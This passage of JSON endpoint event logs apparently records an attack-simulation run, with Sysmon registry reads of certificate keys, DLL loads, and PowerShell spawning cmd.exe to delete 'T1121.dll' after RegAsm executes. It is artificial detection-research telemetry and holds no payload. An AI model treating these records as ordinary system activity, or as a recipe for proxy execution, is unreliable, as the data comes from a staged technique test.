"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 6712, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010FC394D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "mscoreei.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570868860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570869020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"del T1121.dll\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3428, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570869070000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869020000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869020000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869020000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869020000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869020000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" - }, - { - "event_type": "process", - "pid": 3428, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010476B4D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 5836, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570869260000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5836, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5836, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5836, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5836, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5836, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010656C4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clr.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570869180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570869340000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 